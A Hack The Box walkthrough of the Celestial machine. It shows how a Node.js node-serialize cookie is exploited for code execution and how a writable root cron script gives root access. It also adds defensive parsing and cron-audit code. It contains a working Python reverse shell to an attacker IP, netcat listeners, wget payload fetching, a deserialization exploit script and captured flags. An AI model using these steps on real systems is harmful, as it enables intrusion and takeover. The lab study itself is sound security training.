
Celestial HTB Walkthrough

A comprehensive penetration testing walkthrough of the Celestial HTB machine demonstrating advanced exploitation techniques including Node.js deserialization attacks and privilege escalation through cron job manipulation.

🎯 Executive Summary

Celestial is a Linux-based vulnerable machine that showcases the dangers of insecure deserialization in Node.js applications. The exploitation path involves:

  1. Identifying a Node.js application vulnerable to deserialization attacks
  2. Crafting a malicious serialized payload for remote code execution
  3. Leveraging misconfigured cron jobs for privilege escalation
  4. Gaining root access through scheduled task manipulation

πŸ” Reconnaissance

Initial Scanning

export target=10.129.228.94

# Comprehensive port scan
sudo nmap -p- --min-rate 1000 -sT -vvv $target

# Service enumeration on discovered ports
sudo nmap -sC -sV -p 3000 -T4 $target

Scan Results:

Web Application Assessment

Visiting http://10.129.228.94:3000/ reveals a simple web application that processes user information through serialized cookies.

πŸ•΅οΈ Vulnerability Analysis

The application uses base64-encoded serialized cookies for session management:

Original Cookie Analysis:

Cookie: eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D

# URL decode + Base64 decode reveals:
{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

Vulnerability Confirmation

Modifying the cookie values directly affects application output, confirming insecure deserialization:

Test Payload:

{"username":"admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"4444"}

Response: “admin4444” confirms that the application deserializes the cookie server-side and uses the user-controlled values directly.
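As an added example (not code from the writeup or from the Celestial application), here is a hardened replacement for the cookie handling described above: it URL- and base64-decodes the cookie, flags node-serialize's function marker for log review, and parses the result as data-only JSON with a strict four-field schema. The marker string `_$$ND_FUNC$$_` is node-serialize's own convention and is not shown on the page; the second cookie is constructed here to exercise the check.

```javascript
// Added example, not code from the writeup or the Celestial application.
// node-serialize's unserialize() eval()s any string value that begins with its
// function marker "_$$ND_FUNC$$_", which is how a cookie can carry code.
// JSON.parse never evaluates code, so the hardened parser uses it instead.
const FUNC_MARKER = '_$$ND_FUNC$$_';
const ALLOWED_FIELDS = ['username', 'country', 'city', 'num'];

// URL-decode, then base64-decode, as in the cookie analysis above.
function decodeCookie(cookie) {
  return Buffer.from(decodeURIComponent(cookie), 'base64').toString('utf8');
}

// Detection helper for log review: does a decoded cookie carry a node-serialize function?
function looksLikeNdFunction(decoded) {
  return decoded.includes(FUNC_MARKER);
}

// Hardened parser: JSON only, exact field set, short string values.
function parseProfileCookie(cookie) {
  const decoded = decodeCookie(cookie);
  if (looksLikeNdFunction(decoded)) {
    throw new Error('rejected: serialized function marker in cookie');
  }
  const obj = JSON.parse(decoded); // data only, nothing is executed
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    throw new Error('rejected: cookie is not a JSON object');
  }
  const keys = Object.keys(obj).sort().join(',');
  if (keys !== [...ALLOWED_FIELDS].sort().join(',')) {
    throw new Error('rejected: unexpected field set ' + keys);
  }
  for (const k of ALLOWED_FIELDS) {
    if (typeof obj[k] !== 'string' || obj[k].length > 64) {
      throw new Error('rejected: field ' + k + ' must be a short string');
    }
  }
  if (!/^\d{1,6}$/.test(obj.num)) throw new Error('rejected: num must be digits');
  return obj;
}

// The cookie shown in the writeup, and a constructed cookie carrying a
// node-serialize function with the trailing "()" the exploitation steps describe.
const PAGE_COOKIE = 'eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D';
const CONSTRUCTED_BAD = encodeURIComponent(Buffer.from(
  '{"username":"_$$ND_FUNC$$_function(){return 1}()","country":"x","city":"y","num":"2"}'
).toString('base64'));
console.log(parseProfileCookie(PAGE_COOKIE).username);
try { parseProfileCookie(CONSTRUCTED_BAD); } catch (e) { console.log(e.message); }
```

The same schema check also accepts the benign admin/4444 test payload from the page, since only the values changed; what it refuses is any non-string value or any serialized function.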

💣 Initial Exploitation

Research and Preparation

The vulnerability aligns with known Node.js deserialization exploits documented in Exploit-DB 41289.

Required Tools:

# Install vulnerable library for payload generation
npm install node-serialize

# Download nodejsshell.py for payload generation
wget https://raw.githubusercontent.com/ajinabraham/Node.Js-Security-Course/master/nodejsshell.py

Payload Generation

Step 1: Generate reverse shell payload

python2 nodejsshell.py 10.10.14.89 4444

Step 2: Create exploit script (log.js)

var serialize = require('node-serialize');

var y = {
  rce: function () {
    // Generated reverse shell payload from nodejsshell.py (elided)
    eval(String.fromCharCode(...));
  },
};

console.log("Serialized: \n" + serialize.serialize(y));

Step 3: Execute and modify payload

node log.js

Step 4: Add invocation parentheses. Append () after the serialized function body so that the function is invoked as soon as the server's unserialize() evaluates it; without the parentheses the function is only defined, never run. This is the critical step for code execution during deserialization.

Final Exploit Delivery

The crafted malicious cookie payload is:

Reverse Shell Listener:

nc -nlvp 4444

Initial Access

Successful exploitation provides a reverse shell as user sun.

User Flag:

cat user.txt
96abe38234f67c3f5f25c8f601abe83e

⬆️ Privilege Escalation

Enumeration

Cron Job Analysis:

grep -i "CRON" /var/log/syslog

Discovery:

Oct 28 05:00:01 celestial CRON[7365]: (root) CMD (python /home/sun/Documents/script.py > /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py)

Cron Job Analysis

Key findings:

  • The job runs as root and executes python /home/sun/Documents/script.py, a file inside the low-privilege user's home directory.
  • After each run root copies a clean /root/script.py back over it, chowns it to sun:sun, clears the immutable bit and resets its timestamp, so between runs the script is owned and writable by sun.
  • The job fires on a short schedule (the writeup notes a root shell within 5 minutes), so whatever sun places at that path is executed as root on the next run.
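As an added example (not part of the writeup), the audit below parses syslog CRON lines and flags root jobs that hand an interpreter a script under a user-writable location, which is exactly the misconfiguration found here. The input is the page's own log line plus one constructed benign line; the prefix list and interpreter names are assumptions for the heuristic.

```javascript
// Added example, not part of the writeup: audit syslog CRON lines for root
// jobs that execute or touch files under user-writable locations, the
// pattern behind this privilege escalation.
const CRON_RE = /CRON\[\d+\]: \((\w+)\) CMD \((.*)\)$/;
const RISKY_PREFIXES = ['/home/', '/tmp/', '/var/tmp/']; // assumed heuristic
const INTERP_RE = /\b(?:python[23]?|sh|bash|node|perl)\s+(\/[\w./-]+)/g;
const isRisky = p => RISKY_PREFIXES.some(pre => p.startsWith(pre));

// Parse one CRON line into { user, cmd }, or null when it is not a CMD line.
function parseCronLine(line) {
  const m = CRON_RE.exec(line);
  return m ? { user: m[1], cmd: m[2] } : null;
}

// Every distinct absolute path mentioned anywhere in the command string.
function extractPaths(cmd) {
  return [...new Set(cmd.match(/\/[\w./-]+/g) || [])];
}

// Scripts handed to an interpreter (e.g. "python /home/sun/.../script.py").
function executedScripts(cmd) {
  return [...cmd.matchAll(INTERP_RE)].map(m => m[1]);
}

// One finding per root job whose executed script or referenced path is risky.
function auditCronLines(lines) {
  const findings = [];
  for (const line of lines) {
    const job = parseCronLine(line);
    if (!job || job.user !== 'root') continue;
    const executed = executedScripts(job.cmd).filter(isRisky);
    const riskyPaths = extractPaths(job.cmd).filter(isRisky);
    if (executed.length || riskyPaths.length) {
      findings.push({ cmd: job.cmd, executed, riskyPaths });
    }
  }
  return findings;
}

const SAMPLE_LOG = [
  // The line recovered from /var/log/syslog in the walkthrough.
  'Oct 28 05:00:01 celestial CRON[7365]: (root) CMD (python /home/sun/Documents/script.py > /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py)',
  // Constructed benign line: root running a root-owned binary on /etc config.
  'Oct 28 05:05:01 celestial CRON[7401]: (root) CMD (/usr/bin/logrotate /etc/logrotate.conf)',
];

console.log(JSON.stringify(auditCronLines(SAMPLE_LOG), null, 1));
```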

Exploitation Strategy

Step 1: Create reverse shell payload

import socket,subprocess,os
# Connect back to the attacker's listener (10.10.14.89:9001)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.89",9001))
# Redirect stdin, stdout and stderr over the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# Spawn an interactive shell; cron runs this script as root
p=subprocess.call(["/bin/sh","-i"])

Step 2: Host payload

python3 -m http.server 80

Step 3: Replace existing script

cd /home/sun/Documents
rm -f script.py
wget 10.10.14.89/s.py
mv s.py script.py

Step 4: Set up listener

nc -nlvp 9001

Root Access

After the cron job executes (within 5 minutes), a root shell is obtained.

Privilege Verification:

id
whoami
hostname

Root Flag:

cat /root/root.txt
38ba1e10e076213df5db26d1fc5fe7aa

🎓 Lessons Learned

Critical Vulnerabilities

  1. Insecure Deserialization
    • Application blindly trusted user-supplied serialized data
    • No validation or sanitization of input
    • Use of vulnerable node-serialize library
  2. Privilege Misconfiguration
    • Cron job running with excessive privileges
    • Write permissions granted to low-privilege user
    • Lack of file integrity checks

Mitigation Strategies

For Developers:

For System Administrators:

Tools Used

🔒 Security Recommendations

  1. Immediate Actions
    • Replace vulnerable serialization library
    • Implement proper input validation
    • Restrict cron job permissions
  2. Long-term Strategies
    • Regular security training for developers
    • Implement CI/CD security scanning
    • Conduct periodic penetration tests
  3. Monitoring
    • File integrity monitoring for critical scripts
    • Log analysis for deserialization attempts
    • Network monitoring for reverse shell connections

**⚠️ Disclaimer** *This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting security testing.*